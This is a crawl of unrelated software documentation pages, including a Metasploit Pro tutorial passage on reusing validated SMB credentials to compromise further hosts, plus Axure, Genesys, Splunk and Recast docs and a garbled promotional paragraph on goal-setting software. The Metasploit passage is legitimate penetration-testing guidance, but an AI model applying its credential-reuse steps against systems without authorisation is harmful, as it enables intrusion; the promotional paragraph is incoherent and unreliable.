we'll need to select the credentials that we want to add to the workflow. We'll reuse the credential that we validated in the previous task. Since we know that this credential has a valid login for the SMB service on port 445, we'll want to see if we can reuse it on other SMB services. Click the Next button to review the selections. If everything looks good, we can launch the attack. When the task completes, we can see the total number of credentials that were validated, the total number of targets that were validated, and the total number of logins that were successful. Now that we have more valid logins, we can try to reuse them find additional targets that can be compromised and additional logins that can be reused. The process can continue until we are no longer able to reuse the credentials on any additional targets.
https://docs.rapid7.com/metasploit/credentials-tutorial/
2020-11-24T03:49:26
CC-MAIN-2020-50
1606141171077.4
[array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-create-project.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-create-project-2.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-scan-button.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-scan.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-hosts.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-host-data.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-host-data-445.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-nx-scan.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-nx-config-page.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-vulns.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-module-search.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-search-result.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-ms08067-config-page.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-module-configured.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-exploit-task-log.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-active-session.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-collect-data.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-collect-evidence-page.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-loot-task-log.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-management.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/public-link.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/single-cred-view.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/validate-key.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/validated-status.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-reuse-menu.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-reuse-target-selection.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-reuse-cred-selection.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-reuse-review.png', None], dtype=object) array(['/areas/docs/_repos//product-documentation__master/5749334d28edb74f382195092590608b0d5e3e73/metasploit/images/cred-reuse-findings.png', None], dtype=object) ]
docs.rapid7.com
Client Actions:. How it does it: This tool completes this action by using remote WMI. Navigation: Navigate to the Software Updates Scan Cycle Tool by right clicking on a device, selecting Recast RCT > Client Actions > Software Updates Scan Cycle: Screenshot: When the action is run, the following dialog box will open: Permissions: The Software Updates Scan Cycle tool requires the following permissions: Recast Permissions: - Requires the Software Updates Scan.
https://docs.recastsoftware.com/features/Device_Tools/Client_Actions/Software_Updates_Scan_Cycle/index.html
2020-11-24T03:49:54
CC-MAIN-2020-50
1606141171077.4
[array(['media/SUSC_NAV.png', 'Software Updates Scan Cycle Navigation'], dtype=object) array(['media/ss_NAV.png', 'Software Updates Scan Cycle ScreenShot'], dtype=object) ]
docs.recastsoftware.com
Robolist Lite ArticlesInstallation Downloading Theme Installing Theme Installing Plugins Configuring WordPress Settings Customizing Theme Creating a Custom Homepage Customizing Theme Options How to manage Site Title, Logo and Site Icon? How to manage Menu? How to manage Widget Area? How to manage Favorites Button in List? How to add header image for inner pages? Homepage Settings Doc navigation← BhumiResortica Lite → Was this article helpful to you? Yes No 1 How can we help? Name Email subject message
https://docs.codethemes.co/docs/robolist-lite/
2020-11-24T04:12:48
CC-MAIN-2020-50
1606141171077.4
[]
docs.codethemes.co
Shape Widgets The various boxes, buttons, and headings in the Common section of the Default widget library are all shape widgets, along with the placeholder, label, and paragraph. The icons available in the Icons widget library are shapes too, as are any widgets you draw with the pen tool. Creating ShapesCreating Shapes Drag from the Libraries PaneDrag from the Libraries Pane Axure RP comes with a wide variety of ready-to-use shapes that you can access in the Libraries pane. To add one to your design, drag it from the pane and drop it onto the canvas. The Insert MenuThe Insert Menu The Insert menu at the top-left of the interface contains a number of additional shapes you can add to your designs. Select a shape and click-and-drag on the canvas to draw it. You can constrain its dimensions by holding SHIFT as you drag. The most commonly used shapes can also be drawn using the following single-key shortcuts: - Rectangles - Ovals - Lines - Text (paragraph widgets) - Pen tool for freehand drawing The Pen ToolThe Pen Tool You can draw your own vector shapes using the pen tool, available in the Insert menu or by pressing P. - Click the first point to close the path, or double-click the canvas to create an open path Convert SVGs to ShapesConvert SVGs to Shapes You can edit SVG assets you've imported into Axure RP by right-clicking and selecting Transform Image → Convert SVG to Shapes. This will replace the SVG image with one or more shape widgets, which you can then edit just as you would any other shape widget. Import from SketchImport from Sketch You can copy assets directly from Sketch and paste them into Axure RP as shape widgets. Download and install the Axure plugin for Sketch. In Sketch, Sketch elements into the project. Import from Adobe XDImport from Adobe XD You can copy assets directly from Adobe XD and paste them into Axure RP as shape widgets. Download and install the Axure plugin for Adobe XD. In XD, XD elements into the project. Import from FigmaImport from Figma You can copy assets directly from Figma and paste them into Axure RP as shape widgets. Install the Axure plugin for Figma. In Figma, select the elements you want to copy and go to Plugins → Axure → Copy Selection for RP. (Alternatively, you can copy all assets with the Copy All Frames for RP option.) In Axure RP, use Edit → Paste or right-click the canvas to paste the Figma elements into the project. Adding and Editing TextAdding and Editing Text You can add text to a shape widget or edit its current text via any of the options below: - Double-click the shape to enter text-editing mode - Select the shape and press ENTER to enter text-editing mode - Right-click the shape and select Edit Text in the context menu - Select the shape and begin typing. (This option is only available if you have disabled the single-key shortcuts) You can also automatically fill a shape widget with placeholder text by right-clicking it and selecting Fill with Lorem Ipsum. Image FillsImage Fills In addition to the other style options available in the Style pane, shape widgets can also be given background images. To give a shape a background image, select it and use the Image button under Fill in the Style pane. Rotating ShapesRotating Shapes Use the Rotation field at the top of the Style pane to rotate selected shapes on the canvas. The field accepts positive and negative degree values with up to two decimal places. Positive values rotate shapes to the right, and negative values rotate shapes to the left. Reset Text RotationReset Text Rotation After rotating a shape widget, you can set the rotation of the shape's text back to 0° by right-clicking it and selecting Transform Shape → Reset Text to 0°. Editing ShapesEditing Shapes Change ShapesChange Shapes To change a shape widget to a different shape, right-click and select Select Shape in the context menu. This will bring up a list of Axure RP's preconfigured shapes that you can choose from. You can change any shape widget in this fashion. Doing this instead of creating a new shape widget when you want to change shapes preserves all of the widget's notes and interactions. Edit Vector PointsEdit Vector Points After you've created a shape, you can tweak it further by editing its vector points. To get started, select the widget and double-click its border or right-click and select Edit Points in the context menu. Drag a vector point to move it. To add a new point, click a blank spot on the border. To delete a point, select it and press DELETE or right-click and select Delete in the context menu. To toggle a point between curved and sharp, double-click it or right-click and select Curve or Sharpen in the context menu. You can also curve or sharpen all points at once by right-clicking the widget and selecting either option under Transform Shape. Shape TransformationsShape Transformations You can apply a number of transformations to one or more selected shape widgets. Right-click your selection and go to Transform Shape to access these options. Flip Horizontal/Vertical: Flips the shape across the the y-axis (horizontally) or the x-axis (vertically) Unite: Unites multiple shapes into a single path Subtract: Subtracts one or more shapes from another. The front shapes will be subtracted from the backmost shape, based on their z-index (stack order) as indicated in the Outline pane Intersect: Preserves only the intersecting portions of two or more shapes Exclude: Joins two or more shapes together, excluding any overlapping segments. The overlapping area is eliminated, and the remaining sections of each shape are preserved in one shape that could potentially have multiple paths Combine: Combines two or more shapes into a single shape and preserves each original path (as opposed to Unite) Break Apart: Breaks previously combined shapes into separate shapes Curve/Sharpen All Points: Curves or sharpens all vector points in the selected shape(s) Convert to ImageConvert to Image If you want to swap out a placeholder or other shape for a real image, you can convert your shape widget to an image widget while preserving all its notes and interactions. Just right-click the shape widget and select Convert to Image in the context menu. Reference PagesReference Pages Assigning a reference page to a shape does three things: - The text on the shape is set to the name of the page. - The shape’s text is automatically updated if the page is renamed. - Clicking the shape in the web browser opens the page. To assign a reference page to a shape widget, click Show All in the Shape Properties section of the Interaction pane, and then click Reference Page. .
https://docs.axure.com/axure-rp/reference/shapes/
2020-11-24T03:31:39
CC-MAIN-2020-50
1606141171077.4
[array(['/assets/screenshots/widgets/box-1-icon.png', 'Box 1 widget'], dtype=object) array(['/assets/screenshots/widgets/ellipse-icon.png', 'Ellipse widget'], dtype=object) array(['/assets/screenshots/widgets/placeholder-icon.png', 'Placeholder widget'], dtype=object) array(['/assets/screenshots/widgets/button-icon.png', 'Button widget'], dtype=object) array(['/assets/screenshots/widgets/heading-1-icon.png', 'Heading 1 widget'], dtype=object) array(['/assets/screenshots/widgets/label-icon.png', 'Label widget'], dtype=object) array(['/assets/screenshots/widgets/paragraph-icon.png', 'Paragraph widget'], dtype=object) array(['/assets/screenshots/widgets/sticky-1-icon.png', 'Sticky 1 widget'], dtype=object) array(['/assets/screenshots/widgets/shapes-insert-menu.png', 'shape options in the Insert menu'], dtype=object) array(['/assets/screenshots/widgets/lines-pen-tool.png', 'using the pen tool to draw a curved line'], dtype=object) array(['/assets/screenshots/widgets/shapes-image-fills.png', "setting a shape's background fill to an image"], dtype=object) array(['/assets/screenshots/widgets/organizing-widgets-rotating1.png', None], dtype=object) array(['/assets/screenshots/widgets/organizing-widgets-rotating2.png', None], dtype=object) array(['/assets/screenshots/widgets/shapes-edit-vector-points.png', "editing a shape's vector points"], dtype=object) array(['/assets/screenshots/widgets/shapes-transform-unite.png', 'unite transformation'], dtype=object) array(['/assets/screenshots/widgets/shapes-transform-subtract.png', 'subtract transformation'], dtype=object) array(['/assets/screenshots/widgets/shapes-transform-intersect.png', 'intersect transformation'], dtype=object) array(['/assets/screenshots/widgets/shapes-transform-exclude.png', 'exclude transformation'], dtype=object) array(['/assets/screenshots/widgets/shapes-reference-pages.png', 'selecting a reference page for a shape widget'], dtype=object)]
docs.axure.com
One of the first things you will notice when you create a Knowledge Base site is the home page looks quite empty. There are a couple of web parts already added to the page and one of them is the Tree View web part. You need to configure this web part to suit your environment. From the KB Admin site, edit the Tree View web part.
https://docs.bamboosolutions.com/document/configure_the_kb_tree_view_web_part/
2020-11-24T03:23:42
CC-MAIN-2020-50
1606141171077.4
[]
docs.bamboosolutions.com
Field Used for Source warehouse Select a warehouse from which goods are to be withdrawn. Select a source warehouse from the list of created warehouses. Destination warehouse Select a warehouse you will transfer the goods to. Choose a destination warehouse from the list of created warehouses. You can select one and the same warehouse as both source and destination warehouses if you wish to transfer goods within one warehouse but between its different sections or if you wish to move goods between different inventory accounts. Number Document number is assigned automatically when you save the warehouse movement document based on the selected numerator. Users with the appropriate permissions can override the auto-generated number and enter it manually. After overriding the warehouse movement document number, automated numbering will proceed in the same manner but using the manually set number as a start value. Date Date field is automatically assigned the date and time when the new warehouse movement document was created. Date field indicates the posting date and time, the document date and time as well as the date and time when the movement is to take place or when it took place. You can override the auto-generated date and enter it manually. Note Add any extra details regarding the transfer of goods if needed. Attachment Add any additional files or external links related to the warehouse movement.
https://docs.codejig.com/en/entity2305843015656313960/view/4611686018427392343
2020-11-24T03:04:36
CC-MAIN-2020-50
1606141171077.4
[]
docs.codejig.com
Outcome probabilities Contents - 1 Configure outcome probabilities - 2 Trigger an action map based on outcome probabilities - 3 Trigger based only on outcome probabilities - 4 Trigger an action map by outcome probability - 5 Trigger an action map based on a change in behavior - 6 Improve your results Learn how to trigger an action map based on the likelihood that an outcome will occur. Prerequisites - Configure the following permissions in Genesys Cloud: - Journey > Action Map > Add, Delete, Edit, and View (to create action maps) - Journey > Action Target > View (to select a team to handle interactions from the action map) - Create segments. - Create outcomes. Configure outcome probabilities When you create an action map, you configure it to trigger based on the probability that a user will achieve an outcome. For information about how Genesys Predictive Engagement, predicts outcome probabilities, see Overview of outcome predictions and probabilities. - In the action map, under Configure outcome probability, select the outcome. - Use the sliders to configure the outcome probability. Trigger an action map based on outcome probabilities You can create an action map that triggers when: - A customer is likely to achieve a specific outcome - The customer's more recent behavior changed that likelihood After you select an outcome, these configuration choices appear as two sliders: - To minimize an outcome, such as preventing a call to Support, use only the Set likelihood to achieve outcome slider. - To maximize an outcome, such as making a sale, use both sliders. Example: Minimize the likelihood of a negative outcome You want to initiate a proactive chat when a customer is on the Contact Us page and is likely to call for assistance. To avoid the phone call, you set the Set likelihood to achieve outcome slider to 70% because Genesys Predictive Engagement estimates that by the time a customer is on the Contact Us page, they are 70% likely to call Support. Example: Maximize the likelihood of a positive outcome When a customer puts an item in their shopping cart, Genesys Predictive Engagement predicts that a customer is 70% likely to complete their purchase. However, when a customer subsequently removes the item from their cart, Genesys Predictive Engagement changes its prediction to 30% or less. To get the customer back on track if this happens, set the Set likelihood to achieve outcome slider to 70% and the Detect change in behavior slider to 30% because you want to pop a chat that encourages the customer to complete their purchase. Trigger based only on outcome probabilities You can trigger the action map based on a combination of a matched segment or visitor action and the probability of them achieving an outcome. However, you do not have to. Trigger an action map by outcome probability To configure the action map to trigger based on the likelihood of an outcome occurring: - From the Configure Outcome Probability list, select the outcome. - Set the Set likelihood to achieve outcome slider to the desired value. Trigger an action map based on a change in behavior To configure the action map to trigger based on a change in the customer's behavior: - From the Configure Outcome Probability list, select the outcome. - Set the Set likelihood to achieve outcome slider to the desired value. - Select the Detect change in behavior box. - Set the Detect change in behavior slider to the desired value. Improve your results Initially set the sliders to approximate positions. Start with any reasonable values and observe the effect of the action map. After a few days, change the settings and compare your new results. Adjust the sliders as often as you want until you achieve the results you want.
https://all.docs.genesys.com/ATC/Current/AdminGuide/Outcome_probabilities
2020-11-24T03:42:18
CC-MAIN-2020-50
1606141171077.4
[]
all.docs.genesys.com
How to Organize Your Day Using Goal Setting CHL Training Software The assurance that time is a significant resource is something that we in general ought to agree on. How we contribute the time we have is what chooses the sum we have an impact in our lives and the lives? The beginning push toward time the load up is by ensuring that there is a set technique for managing the time that is open to you. Today, this should be conceivable by usage of target setting programming which can be used for both advantageous and work region devices. The target setting writing computer programs is proposed to help an individual using it, to set the destinations they wish to achieve for some random day. The programming can be downloaded to no end or at a cost dependent upon the features it maintains and the architect who arranged it. To use the item, one needs to download it and make their specific profiles using the gave data fields. Depending on what an individual attempts to achieve for some irregular day, they can continue to set their destinations using the goal setter. One can for instance set destinations concerning the amount of solicitations they have to make, the proportion of courses of action they wish to close on a given day, the amount of laps to be made on the hustling track hence on. One other noteworthy part that one can get in the target setting programming is the component. The essential good situation of having a target setting writing computer programs is that it will help you with managing your time efficiently. It will moreover help you with monitoring all that you have accomplished over a period of time. Individuals have, accordingly an exceptional possibility of examining how they fared on previously and can, hence, set new destinations subject to the past patterns read more now.
http://docs-prints.com/2020/09/19/5-key-takeaways-on-the-road-to-dominating-12/
2020-11-24T04:16:35
CC-MAIN-2020-50
1606141171077.4
[]
docs-prints.com
Client Actions: Software Metering Usage Report Cycle What it does: This tool collects the data that allows you to monitor and client software usage. How it does it: This tool completes this action by using remote WMI. Navigation: Navigate to the Software Metering Usage Report Cycle Tool by right clicking on a device, selecting Recast RCT > Client Actions > Software Metering Usage Report Cycle: Screenshot: When the action is run, the following dialog box will open: Permissions: The Software Metering Usage Report Cycle tool requires the following permissions: Recast Permissions: - Requires the Software Metering Usage Report.
https://docs.recastsoftware.com/features/Device_Tools/Client_Actions/Software_Metering_Usage_Report_Cycle/index.html
2020-11-24T04:18:03
CC-MAIN-2020-50
1606141171077.4
[array(['media/SMURC_NAV.png', 'Software Metering Usage Report Cycle Navigation'], dtype=object) array(['media/SS_NAV.png', 'Software Metering Usage Report Cycle ScreenShot'], dtype=object)]
docs.recastsoftware.com
* parts:*).* @cfg {String} extend A class name to use with the `Ext.application` call. The class must also extend {@link Ext.app.Application}.* - string representing the full class name of the main view or the partial class name following "AppName.view." (provided your main view class follows that convention).* Called automatically when an update to either the Application Cache or the Local Storage Cache is detected.* @param {Object} [updateInfo] updateInfo Update information object contains properties for checking which cache triggered the update* Called automatically when the page has completely loaded. This is an empty function that should be* @return {Boolean} By default, the Application will dispatch to the configured startup controller and* Get an application's controller based on name or id. Generally, the controller id will be the same as the name
https://docs.sencha.com/extjs/6.5.1/modern/src/Application.js.html
2020-11-24T03:48:30
CC-MAIN-2020-50
1606141171077.4
[]
docs.sencha.com
Why do most of the Joomla! PHP files start with "defined(' JEXEC')...? From Joomla! Documentation Almost!). Note, this line should NOT be included in your main index.php file, since this is the program that starts the Joomla! session.
https://docs.joomla.org/index.php?title=Why_do_most_of_the_Joomla!_PHP_files_start_with_%22defined('_JEXEC')...%3F&oldid=74122
2015-08-28T06:12:37
CC-MAIN-2015-35
1440644060413.1
[]
docs.joomla.org
Difference between revisions of "JModelAdmin::getItem"Item Description Method to get a single record. Description:JModelAdmin::getItem [Edit Descripton] public function getItem ($pk=null) - Returns mixed Object on success, false on failure. - Defined on line 273 of libraries/joomla/application/component/modeladmin.php - Since See also JModelAdmin::getItem source code on BitBucket Class JModelAdmin Subpackage Application - Other versions of JModelAdmin::getItem SeeAlso:JModelAdmin::getItem [Edit See Also] User contributed notes <CodeExamplesForm />
https://docs.joomla.org/index.php?title=API17:JModelAdmin::getItem&diff=cur&oldid=57359
2015-08-28T06:16:53
CC-MAIN-2015-35
1440644060413.1
[]
docs.joomla.org
Adding a new menu item From Joomla! Documentation Revision as of 03:16, 6 July 2008 by Jonflgiles }}. A menu item is a link to content. Menus are constructed of multiple menu items. To add a new menu item: - Log in to the Joomla! Back-end Administrator. - Select the menu you wish to add an item to by clicking on the corretc menu in the list in the Menus toolbar menu. - Alternately click Menus > Menu Manager on the toolbar menu and then click the Edit Menu Item(s) icon in the appropriate row of the Menu Manager screen. - Click the New toolbar button to open the Menu Item: New screen. - Select the appropriate menu item type. For example to insert a single Article select Internal Link > Articles > Article Layout. - Complete the Menu Item Details section as required: - Title: This is what is displayed when the menu item is published. - Alias: Used for the SEF features of Joomla!
https://docs.joomla.org/index.php?title=Adding_a_new_menu_item&oldid=8997
2015-08-28T06:24:58
CC-MAIN-2015-35
1440644060413.1
[]
docs.joomla.org
Difference between revisions of "Scheduling an Article to be available only between certain dates" From Joomla! Documentation Latest revision as of 10:25, 28 February 2011 To publish an Article within a specific time frame you do as follows: - Log into the Administrator's Panel - Create a new entry or select an Article in the Content -> Article Manager - While editing article contents you will see the options as shown in the figure below: - Set the Start Publishing and Finish Publishing Dates. This will cause the article to only be published for the specified time period. Scheduling an Article should produce a file icon as seen below: Notes: - The scheduling of articles is not limited to just the back-end administrator's panel. It can also be completed via the front-end administrator's panel as well. - Not setting either area means that the article will always show up until you either turn if off or delete it. - If you only set the Start Date and not the Finish Date, then Joomla! will begin displaying the article on the beginning date given but it will never stop showing the article until you either turn it off or delete it. - If you only set the Finish Date and not the Start Date, then Joomla! will show the article as soon as you have turned it on and will stop showing the article once the ending date has been reached. - If you use both the Start Date and the Finish Date then the article will show up only between the beginning date and the ending date. - If you set the Start Date after the Finish Date then the article will never show up. So if you have created articles and they are not showing up, please check your Start Date and Finish Date settings to ensure sure you have not done this.
https://docs.joomla.org/index.php?title=Scheduling_an_Article_to_be_available_only_between_certain_dates&diff=37631&oldid=8863
2015-08-28T06:06:20
CC-MAIN-2015-35
1440644060413.1
[]
docs.joomla.org
Difference between revisions of "JCache::get" Description Get cached data by id and group. Description:JCache::get [Edit Descripton] public function get ( $id $group=null ) - Returns mixed Boolean false on failure or a cached data string - Defined on line 160 of libraries/joomla/cache/cache.php - Since See also SeeAlso:JCache::get [Edit See Also] User contributed notes <CodeExamplesForm />
https://docs.joomla.org/index.php?title=API17:JCache::get&diff=94813&oldid=46768
2015-08-28T06:20:16
CC-MAIN-2015-35
1440644060413.1
[]
docs.joomla.org
Revision history of "JTableLanguage/11.1" View logs for this page There is no edit history for this page. This page has been deleted. The deletion and move log for the page are provided below for reference. - 21:22, 10 May 2013 JoomlaWikiBot (Talk | contribs) moved page JTableLanguage/11.1 to API17:JTableLanguage without leaving a redirect (Robot: Moved page)
https://docs.joomla.org/index.php?title=JTableLanguage/11.1&action=history
2015-08-28T05:36:44
CC-MAIN-2015-35
1440644060413.1
[]
docs.joomla.org
Because a FINALLY clause may be entered and exited through the exception handling mechanism or through normal program control, the explicit control flow of your program may not be followed. When the FINALLY is entered through the exception handling mechanism, it is not possible to exit the clause with BREAK, CONTINUE, or EXIT - when the finally clause is being executed by the exception handling system, control must return to the exception handling system. program Produce; procedure A0; begin try (* try something that might fail *) finally break; end; end; begin end. The program above attempts to exit the finally clause with a break statement. It is not legal to exit a FINALLY clause in this manner. program Solve; procedure A0; begin try (* try something that might fail *) finally end; end; begin end. The only solution to this error is to restructure your code so that the offending statement does not appear in the FINALLY clause.
http://docs.embarcadero.com/products/rad_studio/radstudio2007/RS2007_helpupdates/HUpdate4/EN/html/devcommon/cm_cant_leave_finally_xml.html
2012-05-27T02:59:04
crawl-003
crawl-003-017
[]
docs.embarcadero.com
The CLR requires that property accessors be methods, not fields. The Delphi language allows you to specify fields as property accessors. The Delphi compiler will generate the necessary methods behind the scenes. CLS recommends a specific naming convention for property accessor methods: get_propname and set_propname. If the accessors for a property are not methods, or if the given methods do not match the CLS name pattern, the Delphi compiler will attempt to generate methods with CLS conforming names. If a method already exists in the class that matches the CLS name pattern, but it is not associated with the particular property, the compiler cannot generate a new property accessor method with the CLS name pattern. If the given property's accessors are methods, name collisions prevent the compiler from producing a CLS conforming name, but does not prevent the property from being usable. However, if a name conflict prevents the compiler from generating an accessor method for a field accessor, the property is not usable and you will receive this error.
http://docs.embarcadero.com/products/rad_studio/radstudio2007/RS2007_helpupdates/HUpdate4/EN/html/devcommon/cm_cant_gen_prop_accessor_xml.html
2012-05-27T02:57:34
crawl-003
crawl-003-017
[]
docs.embarcadero.com
Transaction types via configuration files This documentation does not apply to the most recent version of Splunk. Click here for the latest version. Contents Transaction types via configuration files Any series of events can be turned into a transaction type. Read more about use cases in how transaction types work. You can create transaction types via transactiontypes.conf. See below for configuration details. For more information on configuration files in general, see how configuration files work. Configuration] maxrepeats = <integer> fields = <comma-separated list of fields exclusive = <true | false> aliases = <comma-separated list of alias=event_type> pattern = <ordered pattern of named aliases>. - If there is no "pattern" set (below), defaults to 5m. Otherwise, defaults to -1 (unlimited). maxpause = [repeats = <integer> - Set. to 'false' causes the matcher to look for multiple matches for each event and approximately doubles the processing time. - Defaults to "true". aliases = <comma-separated list of alias=event_type> - Define a short-hand alias for an eventtype to be used in pattern (below). - For example, A=login, B=purchase, C=logoutmeans "A" is equal to eventtype=login, "B" to "purchase", "C" to "logout". - Defaults to "". pattern = <regular expression-like pattern> - Defines the pattern of event types in events making up the transaction. - Uses aliases to refer to eventtypes. - For example, "A, B, B, C" means this transaction consists of a "login" event, followed by a two "purchase" events, and followed by a "logout" event. - Defaults to "". match = closest - Specify the match type to use. - Currently, the only value supported is "closest." - Defaults to "closest." 3. Use the transaction command in Splunk Web to call your defined transaction (by its transaction type name). You can override configuration specifics during search. Read more about transaction.
http://docs.splunk.com/Documentation/Splunk/3.4.14/Admin/TransactionTypesViaConfigurationFiles
2012-05-27T00:22:27
crawl-003
crawl-003-017
[]
docs.splunk.com
tags.conf This documentation does not apply to the most recent version of Splunk. Click here for the latest version. Contents # Copyright (C) 2005-2008 Splunk Inc. All Rights Reserved. Version-2008 Splunk Inc. All Rights Reserved. Version 3.0 # # This is an example of a tags.conf file. Use this file to create, disable, and delete tags for field values. # Use this file in tandem with props.conf. # # To use one or more of these configurations, copy the configuration block into tags.conf # in $SPLUNK_HOME/etc/system/local/. You must restart Splunk to enable configurations and configuration changes. # #] =.
http://docs.splunk.com/Documentation/Splunk/3.4.14/Admin/Tagsconf
2012-05-27T00:22:10
crawl-003
crawl-003-017
[]
docs.splunk.com
. Note: An event type must be configured via eventtypes.conf or saved in order to be tagged. Configuration Tag an event type from within Splunk Web. Note: Make sure you have enabled the eventtype field from the fields drop down menu. - Click on the drop-down arrow next to the eventtype field. - Select Tag event type. - The Tag This Field dialog box pops up. - Enter your tags and click save. Once you have tagged an event type, you can search for it in the search bar with the eventtypetag preface. eventtypetag.
http://docs.splunk.com/Documentation/Splunk/3.4.14/Admin/TagEventTypes
2012-05-27T00:20:35
crawl-003
crawl-003-017
[]
docs.splunk.com
anomalies This documentation does not apply to the most recent version of Splunk. Click here for the latest version. anomalies Synopsis Computes an unexpectedness score for an event. Syntax anomalies [threshold=num] [labelonly=bool] [normalize=bool] [maxvalues=int] [field=field] [blacklist=filename] [blacklistthreshold=num] [by-clause] Arguments - threshold - Datatype: <num> - Description: - labelonly - Datatype: <bool> - Description: - normalize - Datatype: <bool> - Description: - maxvalues - Datatype: <int> - Description: - field - Datatype: <field> - Description: - blacklist - Datatype: <filename> - Description: - blacklistthreshold - Datatype: <num> - Description: Description Determines the degree of unexpectedness of an event's field value, based on the previous maxvalue events. By default it removes events that are well expected (unexpectedness > threshold). The default threshold is 0.01. If labelonly is true, no events are removed, and the unexpectedness attribute is set on all events. The field analyzed by default is _raw. By default, normalize is true, which normalizes numerics. For cases where field contains numeric data that should not be normalized, but treated as categories, set normalize=false. The blacklist is a name of a csv file of events in splunk_home/var/run/splunk/BLACKLIST.csv, such that any incoming events that are similar to the blacklisted events are treated as not anomalous (i.e., uninteresting) and given an unexpectedness score of 0.0. Events that match blacklisted events with a similarity score above blacklistthreshold (defaulting to 0.05) are marked as unexpected. The inclusion of a 'by' clause, allows the specification of a list of fields to segregate results for anomaly detection. for each combination of values for the specified field(s), events with those values are treated entirely separately. therefore, 'anomalies by source' will look for anomalies in each source separately -- a pattern in one source will not affect that it is anomalous in another source. Examples Example 1: Show most interesting events first, ignoring any in the blacklist 'boringevents'. ... | anomalies blacklist=boringevents | sort -unexpectedness Example 2: Use with transactions to find regions of time that look unusual. ... | transam maxpause=2s | anomalies Example 3: Return only anomalous events. ... | anomalies See also anomalousvalue, cluster, kmeans, out.
http://docs.splunk.com/Documentation/Splunk/4.0.1/SearchReference/Anomalies
2012-05-26T16:19:42
crawl-003
crawl-003-017
[]
docs.splunk.com
: . Examples Example 1: Analyze the numerical fields to predict the value of "is_activated". ... | af classfield=is_activated.
http://docs.splunk.com/Documentation/Splunk/4.0.1/SearchReference/Af
2012-05-26T16:19:22
crawl-003
crawl-003-017
[]
docs.splunk.com
(which should be the only non- staticitem defined in the module file): void initspam() { (void) Py_InitModule("spam", SpamMethods); }() or PyMac_Initialize(): int main(int argc, char **argv) { /* Pass argv[0] to the Python interpreter */ Py_SetProgramName(argv[0]); /* Initialize the Python interpreter. Required. */ Py_Initialize(); /* Add a static module */ initspam();. A more substantial example module is included in the Python source distribution as Modules/xxmodule.c. This file may be used as a template or simply read as an example..
http://docs.python.org/release/1.5.2p2/ext/methodTable.html
2012-05-26T16:19:40
crawl-003
crawl-003-017
[]
docs.python.org
crawl.conf This documentation does not apply to the most recent version of Splunk. Click here for the latest version. Contents crawl.conf crawl.conf.example # Copyright (C) 2005-2008 Splunk Inc. All Rights Reserved. Version 3.0 # # crawl.conf.spec # Copyright (C) 2005-2008 Splunk Inc. All Rights Reserved. Version 3.0 # #" [default] logging = <warn | error | info | debug> * Set crawl's logging level -- affects the logs in * Defaults to warn. [crawlers] * This stanza enumerates all the available crawlers. * Follow this stanza name with a list of crawlers. crawlers_list = <comma-separated list of crawlers> * Create the crawlers below, in a stanza with the crawler name as the stanza header. [file_crawler] * Set crawler-specific attributes under this stanza header. * Follow this stanza name with any of the following attributes. * The stanza name is the crawler name for crawlers_list (above). tha match the patterns. * There is an implied "$" (end of file name) after each pattern. * Defaults to: *~, *#, *,v, *readme*, *install, (/|^).*, *passwd*, *example*, *makefile, core.* packed_extensions_list = <comma-separated list of extensions> * Specify extensions of compressed files to include. *.
